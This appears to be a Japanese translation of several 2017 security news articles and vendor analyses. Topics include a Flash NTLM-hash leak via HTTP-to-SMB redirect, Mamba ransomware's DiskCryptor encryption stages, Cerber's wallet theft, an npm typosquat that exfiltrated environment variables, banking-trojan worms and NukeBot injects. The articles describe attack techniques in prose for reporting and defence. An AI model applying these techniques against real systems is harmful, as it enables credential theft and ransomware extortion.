     Adobeは、Flash Player 23.0.0.162のリリースで、このフローをパッチした。このパッチは、UNC(Universal Naming Convention(汎用命名規則), 例: \\10.0.0.1\some\file.txt)やファイルシステム・パス(file://///10.0.0.1/some/file.txt)で、URLへのあらゆるアウトバウンド接続をFlashにさせないようにするものであった。
     Ruytenbergが発見した新しいバグは、Adobeの新しい防御手段をバイパスする巧妙な策略に依存している。この研究者のテクニカル・ブログ中の説明によると、攻撃者は、HTTPやHTTPSを介してリモートサーバへのリクエストを作成するFlashファイルをロードすることで、UNCやファイルパスURLに関するAdobeの禁令に適合することができる。
     悪意あるサーバの側からすると、攻撃者は、ローカルなNTLMハッシュ(ユーザの資格情報)を収集するために、従来通り、この同じテクニックを使用するSMBサーバーへ、この着信要求を中継するために古典的な302 HTTPリダイレクトを使用することができる。


    SMBtrap output

    攻撃はChromeやEdgeでは動作しない

     Ruytenbergは、Office(2010, 2013, 2016), Firefox, Internet Explorer中でFlashファイルがロードされた時だけ、この攻撃が動作すると発言している。ChromeやEdgeのようなブラウザは、この攻撃の影響を受けない。
     更に、この攻撃は、Flashの"remote"と"local-with-networking"サンドボックス(攻撃者がローカルデータを抽出することを防がなければならない二つのセキュリティ・セットアップ)を破る。
     「Flash Player 23は、非HTTP URLに関するあらゆるアウトバウンド・リクエストを拒否することによって潜在的な攻撃ベクトルを最小限にしている」とし、更に、「しかしながら、入力の正当性確認(input validation)は、一回だけしか実行されないので、初期のHTTPリクエストが確認されている間、連続的なリダイレクトは行われない」と、Ruytenbergは説明している。

    脆弱性は様々な方法で悪用される

     Bleeping ComputerへのeMailで、Ruytenbergは、より詳細に可能性のある攻撃のシナリオを明らかにしている。
     「この攻撃の複雑性は、大変低い。可能性のある攻撃のシナリオは以下を含む」と、この研究者は発言している。
      ・ Web: 悪意あるペイロードをFlashアプリケーションに供給している(セキュリティ侵害された可能性のある)Webサイトを訪問すること。これは、サードパーティーのドメイン(悪意ある広告者からのもののような)を含む。
      ・ eMail、Windowsファイル共有: 悪意あるFlashアプリケーションを埋め込んだローカルHTMLファイルを開くこと。このシナリオでは、Flashアプリケーションは、Defaultの"remote"サンドボックスに対立する"local-with-networking"中で実行することに注意しなさい(しかし、両方のサンドボックスは共に脆弱である)
      ・ Microsoft Office: WordとExcelドキュメントはFlashコードを埋め込むことを可能にしている。それ故、悪意あるコードは、Officeドキュメント中に埋め込まれ、次に、WebやeMailを介して拡散することが可能である。

    Severity評価が低くとも見くびってはならない

     この脆弱性は、CVSSのSeverityスコア4.3(10段階で)と評価されている。よく調べると、これは、あなたが悪意ある広告キャンペーンで見ている物のようには見えない。
     他方、このフローは、エコノミックや国家丸抱えサイバースパイ キャンペーンで見てきたような、特定の企業や個人を標的にした目標型攻撃にうってつけである。
     「厳密に、悪用された場合、リークされる情報は、Windowsユーザの資格情報に限定される。」と、更に、「しかしながら、これらの資格情報を保有されていることは、潜在的に大変有害である」と、RuytenbergはBleeping Computerに告げている。
     「例えば、これは、攻撃者が特権を昇格し、犠牲者のマシンに(永続的に)マルウェアをインストールする事を可能にする」、このエキスパートは続けて、「それ故、CVSSスコアは、この脆弱性が悪用された場合に発生する損害を完全に表現しているわけではない」と追加している。


    Mamba身代金要求型マルウェアが回帰
    Kaspersky : SecureList (2017/08/09)
     2016年末、San FranciscoのMunicipal Transportation Agency(サンフランシスコ市営鉄道)に対する大攻撃があった。この攻撃は、Mamba身代金要求型マルウェアを使用して実行された。この身代金要求型マルウェアは、ディスク全体を暗号化するための正当なユーティリティDiskCryptorを使用している。今月、我々は、この身代金要求型マルウェアの背後にいるグループが、企業に対する彼らの攻撃を再開したことに気がついた。

    攻撃されている国

     以下に位置する企業に対する攻撃を、我々は現在監視している。

    Brazil
    Saudi Arabia

    攻撃ベクトル

     通常通り、このグループは組織のネットワークへのアクセスを取得し、この身代金要求型マルウェアを実行するためにPsExecを使用する。また、犠牲者のネットワーク中の夫々のマシンに関し、この脅威の執行者が、DiskCryptorユーティリティ用のパスワードを生成することに言及することは重要である。このパスワードは、この身代金要求型マルウェア ドロッパーにコマンドライン引数を介して渡される。

    【訳者補注】 PsExec: PsExec は Telnet に代わる軽量のユーティリティで、クライアント ソフトウェアを手動でインストールしなくても、他のシステムでプロセスを実行できるだけでなく、コンソール アプリケーションとの十分な対話性も備わっています。PsExec の最も便利な用途には、たとえば、リモート システムで対話型のコマンド プロンプトを起動したり、ipconfig のようなリモートの実行に対応したツールを起動したりすることが挙げられます。PsExec で起動しない限り、そのようなツールにはリモート システムについての情報を表示する機能がありません。(Microsoft Technetより)


    マルウェア実行の例

    技術的解析

     一言で言えば、悪意ある挙動は二つのステージに分けることができる。

    Stage 1(準備):

      ・ フォルダ “C:\xampp\http“ を作成する
      ・ このフォルダにDiskCryptorコンポーネントをドロップする
      ・ DiskCryptorドライバをインストールする
      ・ DefragmentServiceと名付けられたシステムサービスを登録する
      ・ 犠牲者のマシンを再起動する

    Stage 2(暗号化):

      ・ MBR(マスターブートレコード)にブートローダーをセットアップし、DiskCryptorソフトウェアを使用してディスクパーティションを暗号化する
      ・ クリーンアップ
      ・ 犠牲者のマシンを再起動する

    Stage 1(準備)

     このトロイがDiskCryptorユーティリティを使用している時、第一段階は、犠牲者のマシンにこのツールをインストールする処理である。この悪意あるドロッパーは、彼ら独自のリソース中にDiskCryptorのモジュールを格納する。


    DiskCryptorモジュール

     OS情報により、このマルウェアは、32もしくは64bitのDiskCryptorモジュールを選択することができるようになっている。この必須のモジュールは、"C:\xampp\http"フォルダにドロップされる。


    このマルウェアは必須のモジュールをドロップする

     その後、ドロップされたDiskCryptorインストーラを起動する。


    DiskCryptorインストーラの呼び出し

     DiskCryptorがインストールされると、このマルウェアは、SERVICE_ALL_ACCESS と SERVICE_AUTO_START パラメータを持つサービスを作成する。


    悪意あるサービス関数の作成

     Stage 1の最後のステップは、このシステムを再起動することである。


    強制再起動関数

    Stage 2(暗号化)

     DiskCryptorソフトウェアを使用することで、このマルウェアは、新しいブートローダをMBRにセットアップする。


    MBRにブートローダーをセットアップするためのコール

     このブートローダーは犠牲者用の脅迫文を含んでいる。


    脅迫文

     このブートローダーが設定されると、ディスクパーティションは、ドロッパー用のコマンドライン引数として今迄に特定されていたパスワードを使用して暗号化されるだろう。


    暗号化プロセスのCall Tree(コールツリー)

     暗号化が終了すると、このシステムは再起動される、そして、犠牲者はこの画面上に脅迫文を見るだろう。


    脅迫文

     Kaspersky Lab製品は、以下の決定(PDM:Trojan.Win32.Generic)でSystem Watcherの支援を得て、この脅威を検出する。

    復号

     残念なことに、この正当なDiskCryptorユーティリティは、強力な暗号化アルゴリズムを使用しているために、このユーティリティを使用して暗号化されたデータを復号する方法は存在しない。

    IOCs

    79ED93DF3BEC7CD95CE60E6EE35F46A1


    MicrosoftがOutlookとOffice用の定例外アップデートをリリースしている
    Sophos : NakedSecurity (2017/08/07)
     あなたは、7月の全てのMicrosoft Officeのアップデートを引っ掴んできているだろうか?
     Microsoftは7月11日のアップデート(以前、そして依然としてPatch Tuesday(パッチの火曜日)として知られている)で多数のセキュリティパッチをリリースしたが、幾つかの定例外アップデートが7月27日にリリースされている。このアップデートは、具体的にはOutlookとOfficeのClick-to-run(クイック実行。【訳注】 Office をインストールするための時間を短縮し、複数のバージョンの Office を同じコンピューター上で実行できるように支援するMicrosoft のストリーミングおよび仮想化のテクノロジ(Microsoft Technetより))の脆弱性に適用されるものである。
     幾つかの脆弱性(Outlook 2007, 2010, 2013, 2016,並びに Office 2010, 2016のClick-To-Runにおけるリモートコード実行(RCE))は、7月後半のアップデートで阻止された。
     「このセキュリティアップデートは、ユーザーが、取り分け巧みに細工されたOfficeファイルを開いた場合に、リモートコード実行を可能にしていたMicrosoft Office中の脆弱性を解決する」と、Microsoftは彼らのセキュリティアップデートに記述している。
     具体的には、問題のパッチされたRCE脆弱性は、CVE-2017-8571, CVE-2017-8572, CVE-2017-8663である。
     相も変わらずであるが、我々はいつも通り、可能な限り、これらのアップデートを適用するよう推奨する。攻撃者は、可能な、しなければならないアップデートを全ての者が実行しているわけではないことを認識しているので、これらの脆弱性を利用してくる。Microsoft Officeは、依然としてメジャーな攻撃ベクトルである。そして残念なことに、我々は始終、Officeユーザが攻撃者のターゲットになっていることを見ている。これは悲しいことにOfficeユーザにとって立証済みのことである。
     攻撃者の仕事を必要以上に簡単にしてはならない。出来る限り早急に、これらのパッチを適用しなさい。


    Cerber身代金要求型マルウェアは、今やブラウザパスワード、Bitcoinウォレットデータを盗む
    BleepingComputer : News>Security (2017/08/04)


     Cerber身代金要求型マルウェアは、Infostealer(【訳注】 侵入先のコンピュータから機密情報を収集する有害なソフトウェア(Symantec日本より))のように、犠牲者のコンピュータからデータを収集し盗むことを可能にするアップデートを受け取った。
     Trend Microの二人の研究者Gilbert SisonとJanus Agcaoiliによると、Cerber身代金要求型マルウェアの一番最近のバージョンは、ブラウザパスワードをダンプし、Bitcoinウォレットに関連したファイルを盗むことができるようになっている。

    CerberはInfostealer機能を追加した

     より正確には、Cerberは、Internet Explorer, Google Chrome, Mozilla Firefoxのようなブラウザ中に格納されているパスワードをダンプする。
     更に、Cerberは、三つのBitcoinウォレット アプリケーションに関連したデータファイルを探す。Cerberは検索し、そして、wallet.dat(公式のBitcoin Coreウォレットによって使用される)、 *.wallet(Multibitウォレット アプリケーションによって使用される)、electrum.dat(Electrumウォレット アプリケーションによって使用される)と名付けられたファイルを盗みだす。
     ユーザのブラウザから抽出されたブラウザパスワードは、オンラインアカウントを奪取する役に立つだろうが、Bitcoinウォレット データは、あまり役に立たないかもしれない。
     これらのファイルの全てが、ターゲットのBitcoinウォレットにアクセスするためのパスワードを格納しているわけではない。更に、2013年以来、Electrumアプリケーションは、最早、ウォレット情報を格納するためにelectrum.datファイルを使用していない。これは、Cerberの仲間が、らInfostealerの機能をサポートするために必要とされるコードを、その実際の効果を認識することなく、他のプロジェクトからコピー&ペーストした可能性を示している。
     「この新しい機能は、攻撃者が、身代金要求型マルウェアを収益化するための新しい方法を試していることを示している」とし、「ターゲットのユーザのBitcoinを盗むことは、潜在的な収入の貴重な源となる」と、この二人の研究者は発言している。

    Cerberが初めてではない

     CerberがInfostealer機能を搭載した最初の身代金要求型マルウェアではない。最初のものは、2015年4月にFireEyeによって停止させられた、Kriptovorと名付けられた身代金要求型マルウェア ファミリーである。
     一年後、CryptXXX身代金要求型マルウェアもBitcoinウォレットデータを盗み、その後、ブラウザ認証をダンプするためのサポートを追加した。

    SHA256 hash: 6c9f7b72c39ae7d11f12dd5dc3fb70eb6c2263eaefea1ff06aa88945875daf27


    NPMへのタイポスクワッティング攻撃は2週間未検出のままだった
    The Register : Security (2017/08/02)
     NPM(Node.jsパッケージ マネージメント レジストリ)を介して拡散された悪意あるコードを使用して開発者の認証を盗むための過去2週間のキャンペーンは、39の悪意あるNPMパッケージを削除することで停止された。
     開発者達は、一般的機能を実装するためにNode.jsアプリケーションにこれらのJavaScriptコードのバンドルを定期的に追加している。そこで、彼ら自身がコードを記述する必要がなくなる。
     水曜日に公開されたブログへの投稿に於いて、CJ Silverio(NPMのCTO)は、7月19日から31日までの間、アカウント名hacktaskが、人気のある既存のNPMパッケージに類似している名前の一連のパッケージを公開することでタイポスクワッティング攻撃を実施していたと発言している。
     「今迄、これは殆ど偶発的なものであった」、「幾許かのケースに於いて、我々は、既存のパッケージと競争しているライブラリの著者による故意のタイポスクワッティングを確認してきた。今回、このパッケージのネーミングは、故意と悪意(欺かれたユーザから有用なデータを収集することを目的とする)の両方である」と、Silverioは発言している。
     スウェーデンを拠点とする開発者Oscar Bolmstenは、環境変数を設定するための人気あるスクリプトであるcross-envを検索した人々をペテンに掛けるように設計されたcrossenvと名付けられたパッケージに悪意あるコードを発見した
     「環境変数は、ソフトウェアに認証を渡すための方法として大変一般的であるために、追跡するには大変適切なものである」と、SilverioはThe Registerとの電話インタービューで発言している。
     環境変数は、他のこと(アカウント名、パスワード、トークン、そして、アプリケーション、クラウドサービス、APIにアクセスを提供するキーの格納)にも使用されている。
     今回の場合、この悪意あるコードは、犠牲者のマシンに設定されているあらゆる環境変数をコピーし、それらを攻撃者のコントロールサーバーnpm.hacktask.netに転送することを企てていた。
     crossenvに使用されていたJSON設定ファイルは、package-setup.jsと名付けられたスクリプトを実行する。これは、既存の環境変数を文字列に変換し、次にPOSTリクエストを介して、そのデータを送信する。
     Silverioによると、hacktaskによって登録された「約40」のパッケージは、NPMから削除された。Lift Securityが、不正なパッケージ セットアップコードに関して全てのNPMパッケージをスキャンしたが、他に発見されたものはなかったと、彼女は発言している。
     Silverioは、この攻撃が大変巧みに動作したことへの懸念を口にしている。人々は、検索や公開されたコードをコピー&ペーストすることに依存する傾向にあると指摘しながら、「タイポスクワッティングは、結局のところ、マルウェアがレジストリを取得するための効果的な方法ではない」と、彼女は発言している。
     NPMがhacktaskにリンクしていた39のパッケージの中の殆どは、7月半ば以降、マルウェアの言葉の出現に興味を抱いてダウンロードされた急増部分を除くと、夫々およそ40ダウンロードされている。悪意あるcrossenvパッケージが最もダウンロード(700ダウンロード)されていた。しかし、これらの大部分は、NPMミラーサーバにによって引き起こされた自動ダウンロードであると信じられている。
     Silverioは、公開されていた期間に悪意あるcrossenvパッケージをダウンロードした人々は、およそ50人であると見積もっている。彼女は、この事件の結果としてアカウントが改竄されたと通知してきた開発者は存在しないと発言している。
     GitHubレポジトリの検索は、悪意あるcrossenvパッケージに対する僅かな参照を返してくる。
     このhacktaskアカウントは締め出されたが、この者やこのアカウントの背後にいる者は、公に同定されていない。
     他の誰かが、異なるアカウント名の下で同様の攻撃を実施することを阻止するための方策を、NPMが配備したか否かの質問に対して、Silverioは、攻撃は、多分即時に捕獲されることはないと認めた。
     「我々は、公開の瞬間でその全てを捕獲できなくとも、我々は、かなり良く動作するシステムを持っている」と、NPMコミュニティの警戒システムを賞賛しながら、彼女は発言している。
     それでもなお、彼女のブログへの投稿に於いて、Silverioは、NPMが、今後のタイポスクワッティングを阻止するために、パッケージ中で類似の名前を同定する方法を調査していると発言している。この会社はまた、レジストリに発表されたスパムを検出するためにセキュリティ企業Smyteと共同作業している。明らかに、スパマーは、Webサイトの検索ランキングを押し上げるために、READMEファイルが検索エンジンによってインデックス化されることを希望してパッケージを公開している。
     Node.jsセキュリティに関するKiwicon(【訳注】 2007年以来ニュージーランドのウェリントンで開催されているコンピュータ・セキュリティ・カンファレンス(Wikipediaより))での2016年のプレゼンテーションで、開発者Jeff Andrewsは、「私はNode.js/npmを使用している。どうすれば私は安全でいられるか?」という質問を彼自身に提示した。彼の答えは、「あなたは、できない。」であった。


    バンキング・トロイは自己拡散型ワーム コンポーネントを追加している
    BleepingComputer : News>Security (2017/07/28)
     バンキング・トロイ(Emotet と Trickbot)は、同じネットワーク上の他の犠牲者に感染するチャンスを向上させるために自己拡散コンポーネントのサポートを追加した。
     これは、最近までバンキング・トロイは自己拡散モジュールを搭載しておらず、主に検出されずに生き残ることや、犠牲者への警告なしにユーザ認証を収集することに焦点をあてていたために、これは何かしら新しいものである。
     我々が今日のマルウェア中にワーム コンポーネントの復活を確認したのは、WannaCry身代金要求型マルウェアと、それに続くNotPatyaの成功を受けた後だけである。

    Emotet

     自己拡散コンポーネントを最初に呼び物にしたのは、Emotetトロイである。FidelisBarklyの研究者によって発見されたこのバンキング・トロイは、自己拡散用のRARファイルを感染したホストに投下し、これを検索に使用し、感染したホストのログインをブルートフォースすることによってローカルネットワーク リソースへのアクセスを取得する。
     ネットワーク内部を横断的に移動するためのEmotetの自己拡散コンポーネントを、eMailクライアントから連絡帳を抽出し、各犠牲者に悪意あるeMailをスパムすることに依存する増殖モジュールと混同してはならない。
     このバンキング・トロイは、今日の最も能動的な脅威の一つである。そして、銀行の認証を収集し、不正なMitB(Man-in-the-Browser、【訳注】 マルウェアがネットバンキングユーザーの端末上のWebブラウザを乗っ取り、アカウント情報を盗み見たり、ブラウザ上の画面を書き換えることで送金情報を変更してしまうといったもの。日本でも2012年の10月以降、様々な金融機関で被害が確認されている(FFRIより))攻撃を使用して銀行口座から金銭を盗むために犯罪者を支援するものでもある。このトロイはまた、ソーシャルメディア・アカウント用の認証も収集したり、感染したホストに他のマルウェアを投下する(言うなれば、マルウェア ダウンローダとして動作する)ためにも使用されている。

    TrickBot

     自己拡散するワームのようなモジュールの誇示を発見された二つ目のバンキング・トロイは、先月WebベースのCRMSとPayPalユーザをターゲットにするように拡張されたTrickBotである。
     TrickBotは、巨大なNucursボットネット経由で送信されるスパムを介して拡散することが確認されている。そして、先週発見されたサンプルは、同じネットワーク上の手近なコンピュータに、このトロイを拡散するように設計されている新しいSMBワームを含んでいた。
     FlashpointDeloitteの研究者によって発見されたこのモジュールは、NetServerEnum Windows APIを介してサーバのリストがないかドメインを詳しく調べ、Lightweight Directory Access Protocol (LDAP)を介して他のコンピュータを列挙する。
     Research Vitali KremezのFlashpointディレクターからの朗報は、このSMBモジュールが未だ完全に実装されていないように思われることである。
     悪いニュースは、TrickBotの作成者は、定期的にその能力を絶えず拡大させているので、SMBワームがアップされ実行されるまで、時間はかからないことを意味している。
     数年間、ワームは滅亡したかのように思われていた。WannaCryとNotPetya身代金要求型マルウェアの大流行は、ワームが最初の段階で成功する理由をサイバー犯罪者に示した。マルウェア研究者の間での一致した意見は、近い将来、危険なマルウェア(バンキング・トロイや身代金要求型マルウェア)のDefault設定に自己拡散型ワームを配備するマルウェアの増加を見るだろうということである。

    Kevin BeaumontのTwitterへのリンク


    ShieldFSは、身代金要求型マルウェア感染の効果を停止し復帰させることができる
    BleepingComputer : News>Security (2017/07/27)
     イタリアの研究者達が、身代金要求型マルウェア感染の明瞭な証拠を検出し、あらゆる悪意ある行動を停止し、どのような暗号化されたファイルでさえ以前の状態に戻す能力のあるWindowsドロップ-イン・ドライバとカスタム ファイルシステムを開発した。
     ShieldFSと呼ばれるこの新しいプロジェクトは、ミラノ工科大学出身の7人の研究者の仕事であり、昨日、Black Hat USA 2017セキュリティ カンファレンスで詳細に説明された。

    ShieldFSはCOW(Copy-On-Write)と暗号化操作のスキャナとして働く

     今年公開された二つの研究論文[1, 2]によると、ShieldFSは、Copy-On-Write(COW、書き換え時コピー。【訳注】 子プロセス生成時に親プロセスのメモリー空間を複製せず,書き込み処理が発生したときにはじめて複製する仕組み(ITproより))操作を検出するように設計された複雑なメカニズムである。
     COW操作は、アプリケーションがファイルを取得し、それをコピーし、修正した後、オリジナル ファイルを置き換える時に発生する。今日の殆どの身代金要求型マルウェア・ファミリーは、オリジナルのファイルを取得し、そのコンテンツを暗号化し、そのオリジナルを(【訳者挿入】 暗号化したファイルで)置き換えるので、COW操作に依存している。
     ShieldFSは、COW操作を検出するだけでなく、しばしばファイル暗号化プロセス中で使用されるシンメトリック暗号(【訳注】 対象暗号。暗号化及び復号に同じ鍵を利用する暗号)プリミティブの使用を探す。
     ShieldFSは、これらの制限に適合するイベントを検出すると、内部挙動モデルに問い合わせ、悪意ある身代金要求型マルウェアと潔白なプロセスを識別する。
     研究者達によると、ShieldFSは現在2245の正当なアプリケーションの適用モデルが用意されており、正当なプロセスをブロックする結果をもたらす可能性のある誤検出は殆ど無しに動作することが可能である。

    ShieldFSは自己回復ファイルシステムを使用して暗号化されたファイルを復元する

     身代金要求型マルウェアが検出されると、ShieldFSは、そのプロセスを停止するように、そのオペレーティングシステムに信号を送る。そして、あらゆる身代金要求型マルウェアの悪意あるアクションを元に戻すためのカスタム ファイルシステムを使用している。
     技術レベルでは、これは、ShieldFSが特定の量のファイルを復元することを可能にするために、COW操作を遮断し、短期間オリジナルのファイルのコピーを維持するように設計されたカスタム仮想ファイルシステムをインストールするドロップ-イン・ドライバとしてパッケージされているので、可能である。
     ShieldFSリアルタイムと自己回復ファイルシステムは、殆どの身代金要求型マルウェア ファミリーが、特化されたデータ リカバリ ソフトウェアを介してファイルの復元を防ぐために、それらがユーザのファイルを暗号化した後、必ず削除するシャドー ボリューム コピーの代替として働くとも言える。
     以下は、活動中のShieldFSのビデオである。研究者達は、依然としてこのプロジェクトで作業しているが、彼等は、近い将来にShieldFSの完全版を公式にリリースする計画があると発言している。Black Hatカンファレンスでのプレゼンテーションは、コチラ(PDFフォーマット)から利用できる

    活動中のShieldFSのビデオ:https://youtu.be/0UlgdnQQaLM


    オープンソース ソフトウェア ライブラリの欠陥により、数百万のIoTデバイスにハッキングされる可能性
    Bitdefender : blog>IoT News (2017/07/19)
     世界中でインターネットに接続されている数百万のデバイスに、バグだらけのソフトウェア ライブラリが使用されていることが明らかになった後、今一度質問されたことは、IoTのセキュリティに関することである。
     このバッファオーバーフローの脆弱性を「悪魔の蔦」と名付けた研究者達は、このソフトウェアのフローがIPカメラに対して悪用できる一つの方法として、遠隔からビデオ画像にアクセスしたり、あるいは、真の所有者がビデオ画像にアクセスすることを拒否することができるようになるだろうと説明している。
     要するに、想像しやすくするためにハリウッドの強盗映画で発生しているシーンを思い浮かべよう、犯罪者は、ハッキングしたカメラを閲覧して重要な情報を収集したり、実際の犯罪を監視できないようにしている。
     このフロー自体は、gSOAP中に存在している。gSOAPは、インターネットを介してコミュニケートする能力を彼等の製品に提供するためのコード ライブラリを素早く簡単に彼等の製品に組み込みたい開発者によって百万回もダウンロードされているオープンソース ツールキットである。
     そのコードがキチンと書かれていたなら、同じサードパーティーに依存するという多くの異なるデバイスのコンセプトは、必ずしも悪いわけではない。悲しいことに、gSOAPの場合は、そうではなかったようである。
     そして、それは現在大きな意義が存在していることを意味している。Geniva(gSOAPを後押ししている企業)は、そのコードに関するパッチをリリースしたが、これは、gSOAPのバグだらけのバージョンを内部に埋め込まれている無数のIoTデバイスをパッチするわけではない。
     この問題はサプライチェーンを破壊することである。
     この問題のライフサイクルを考えよう。

     - IoTデバイス メーカーは、彼等の製品に或るIoTコードを含める必要がある。そのコードの全てを自分達で記述する代わりに、彼等はサードパーティーのgSOAPライブラリをダウンロードした。
     - IoTデバイス メーカーは、世界中にgSOAPコードを含むデバイスを販売している。
     - 数百の他のメーカーも、同じことを実行している。まもなく、数百万のデバイスが、このgSOAPコードを信頼することになる。
     - セキュリティ研究者が、gSOAPコード中に、悪意あるハッカーによって悪用される虞のある弱点を発見する。
     - zSOAPは、この脆弱性を修正するためにパッチされる。
     - ...するという間違いを犯す。

     理想世界に於いては、全てのメーカーは脆弱性をアナウンスし、彼等製品の将来のバージョンに修正されたコードを具現化し、彼等がすでに販売した製品を遠隔からパッチするように振る舞うだろう。
     しかしながら、IoTの世界は理想から程遠い存在である。メーカーは、倒産するかもしれないし、すでに販売した製品の修正を構築するために金銭、時間、リソースを費やすことに興味がないかもしれないし、最早サポートに興味がないかもしれない。IoT製品の一部は、アップデートを受け取るための基盤構造を何ら持っていない場合さえある(聞くとゾッとするが真実である)。
    あなたは? 気の毒な消費者は、IoT製品がgSOAPを含んでいるのかいないのかさえ認識していない。従って、それが、あなたのIoTデバイスに出現した時に、あなたが統率のとれたセキュリティワイズの実行を切望するなら、あなたは、信頼しているデバイスに悪用のリスクが存在していることを単に忘れている。
     時々、開発者は、彼等の製品中に新しい危険を導入するかもしれないサードパーティーのコードを含めるか否かの調査をすることもなく、サードパーティーのコードを過剰に信頼していると、私は思っている。オープンソースコードの背景にある考え方は、素晴らしい考えであり、多くの目が、そこに脆弱性があるか否か決定するために、そのコードを検証することができるが、これは、誰かが検証に手こずっている場合だけの仕事である。
     企業やホームユーザはどうか? 常に、どのデバイスが公共のインターネットに晒されているのかということについて細やかな注意を払いなさい。可能なら、ハッカーが遠隔からそれらを悪用することを難しくするために、ファイアーウォールの背後にそれらを配置しなさい。そして常に、あなたが購入したIoT製品のベンダーが、真面目にセキュリティに向き合い、このような深刻な問題が発見された時に素早く適切な対応の歴史を持っているか否か検討しなさい。


    NukeBotバンキング・トロイが現実の脅威に
    Kaspersky : SecureList (2017/07/19)
     今春、NukeBotバンキング・トロイの制作者は、彼の作成物のソースコードを公開した。彼は、十中八九幾つかのハッカーフォーラムでの彼の評価を復活させるためであったと思われる。以前、彼は自身の開発したものを積極的に奨励し、常軌を逸した態度をとっていたので、結局、彼はスカマーではないかと疑われた。ソースコードの公開から3ヶ月経った現在、我々は、このバンキング マルウェアの状況にどのような変化があるのかを検証することにした。

    実環境中のNukeBot

     マルウェアのソースコードの公開は、珍しいことではないかもしれないが、依然としてITコミュニティの注意を惹くものであり、その幾許かの関心は通常、コードの調査を超えるものである。NukeBotのケースも例外ではなかった。我々は、このトロイのコンパイルされた幾つかのサンプルをどうにか手にすることができた。それらの大部分は、興味を惹くものではなかった(ローカルサブネットアドレスのままであったり、あるいはC&Cアドレスとして'localhost/127.0.0.1'のままだった)。大変僅かなサンプルが、「真」のアドレスを持ち、「操作可能」であった。このバンキング・トロイのメインの機能は、ユーザのデータを盗むために特定のページにWebインジェクションを実行することであるが、オペレーショナル・サーバからでさえ、我々は、例のようなソースコード中に含まれる'test'インジェクションを受け取っただけだった。


    NukeBotソースコードからのtestインジェクション(画像をクリックすると拡大します)

     我々が手に入れたNukeBotのサンプルは二つの主なタイプに分けることができる。一つはプレーンテキスト文字列のものであり、他の一つは暗号化された文字列のものである。このテストサンプルは一般的にタイプ1に属しているので、我々は、何の問題もなくC&Cアドレスと、このトロイのボディーから解析に要求される他の情報を抽出した。暗号化されたバージョンでは、これは多少複雑であった。暗号キーが最初に抽出される必要があり、その後でなければ、構築されている文字列の値が取得できないためである。当然ながら、上述のことは全て、我々が開発したスクリプトを使用して自動的に実行された。データそれ自体は、実行の冒頭でコールされるこのトロイの唯一のプロシージャ中に集まっていた


    プレーンテキストと暗号された文字列の初期化プロシージャの比較(画像をクリックすると拡大します)

     復号(スクリーンショット中のsub_4049F6関数)はキーをXORすることで実行される


    Pythonで実装されている復号された文字列

     Webインジェクションのトリガーに関して、我々はC&Cサーバとの対話を模倣する必要があった。C&Cアドレスは初期化プロシージャの文字列から取得できた。
     このC&Cと最初に接続した時、このBotは復号インジェクションに使用するRC4キーを送信された。我々は模倣Botを実装する時に、この単純なロジックを使用し、多数のサーバからWebインジェクションをなんとか収集することができた。
     当初、この大多数のボットネットは、我々にとって関心のないテスト インジェクションを受け取るだけであった。しかしながら、その後、我々は幾つかの「戦闘バージョン」のNukeBotを同定した。我々が取得したインジェクションの解析に基づき、我々は、このサイバー犯罪者の主たるターゲットがフランスと米国の銀行であると推測している。


    「戦闘グレード」Webインジェクションの例(画像をクリックすると拡大します)

     我々が取得したこのトロイの全サンプルの内、2-5%が「戦闘グレード」である。しかしながら、これらのバージョンが、数人のやる気のあるサイバー犯罪者によって作成されたものなのか、NukeBotの使用が直ぐに衰えるものなのか、あるいは、このソースコードが組織(もしくはグループ)の手に落ち、幾つかの戦闘グレードのサンプルが増えていくのか、定かではない。我々は、この状況を監視することを継続するだろう。
     我々はまた、Webインジェクション機能を持っていないが、メールクライアントとブラウザのパスワードを盗むように設計された幾つかのNukeBotの修正版を検出した。我々は、ドロッパー内部のこれらのサンプルを独占的に受け取った。その後解凍されたそれらのサンプルは、リモートの悪意あるサーバーから要求されるユーティリティ(「eMailパスワード・リカバリ」のような)をダウンロードした。
     Kaspersky Labの製品は、このNukeBotファミリーのバンキング・トロイをTrojan-Banker.Win32.TinyNukeとして検出する。このバンキング・トロイに含まれているドロッパーは、Trojan-PSW.Win32.TinyNukeを割り当てられている。

    MD5

    626438C88642AFB21D2C3466B30F2312
    697A7037D30D8412DF6A796A3297F37E
    031A8139F1E0F8802FF55BACE423284F
    93B14905D3B8FE67C2D552A85F06DEC9
    A06A16BD77A0FCB95C2C4321BE0D2B26
    0633024162D9096794324094935C62C0
    9E469E1ADF9AAE06BAE6017A392B4AA9
    078AA893C6963AAC76B63018EE4ECBD3
    44230DB078D5F1AEB7AD844590DDC13E
    FAF24FC768C43B95C744DDE551D1E191
    8EBEC2892D033DA58A8082C0C949C718
    6DC91FC2157A9504ABB883110AF90CC9
    36EB9BDEFB3899531BA49DB65CE9894D
    D2F56D6132F4B6CA38B906DACBC28AC7
    79E6F689EECB8208869D37EA3AF8A7CA
    9831B1092D9ACAEB30351E1DB30E8521


    Reyptson身代金要求型マルウェアは、Thunderbirdのアドレス帳を盗むことであなたの友人にスパムしている
    BleepingComputer : News>Security (2017/07/17)
     週末に渡り、Emsisoftのセキュリティ研究者xXToffeeXxが、スペイン人をターゲットにしたReptsonと呼ばれる新しい身代金要求型マルウェアを発見した。それ以来、我々は、この身代金要求型マルウェアの増強された能力を調べてきた。本日、セキュリティ研究者MalwareHunterTeamは詳細に調査し、Reyptsonが、犠牲者の設定したThunderbird eMailアカウントから直接、独自のスパム拡散キャンペーンを実施していることに気がついた
     これは、今までの身代金要求方マルウェアには見られなかった新しい機能である。そこで私は、我々が発見したことを確認するために、この身代金要求型マルウェアの内部をより詳細に調べることにした。Reyptson身代金要求型マルウェアに感染した人々に関しては、残念ながら、現在、無料でこの身代金要求型マルウェアを復号する方法は存在していない。しかしながら、我々は、この身代金要求型マルウェアについて論議したり質問したい人々のために、専用のReyptson Support & Help Topicを立ち上げた。

    Reyptsonは、犠牲者のThunderbirdアドレス帳をスパムすることで拡散している

     私が記憶している他の身代金要求型マルウェアと異なり、Reyptsonは、犠牲者のコンピュータから実施されるスパムeMailキャンペーンを介して、それ自身を拡散させる能力を持っている。この身代金要求型マルウェアは、Thunderbird eMailクライアントがインストールされているか否かをチェックすることで、これを実行する。そして、Thunderbirdがインスト-すされているのであれば、犠牲者のeMail認証とアドレス帳を読み込もうとする。


    Thunderbirdアドレス帳へのアクセス(画像をクリックすると拡大します)

     アドレス帳と認証を取得できたなら、この身代金要求型マルウェアは、犠牲者のアドレス帳にインチキの送り状を送信するスパムキャンペーンを開始する。


    スパム拡散(画像をクリックすると拡大します)

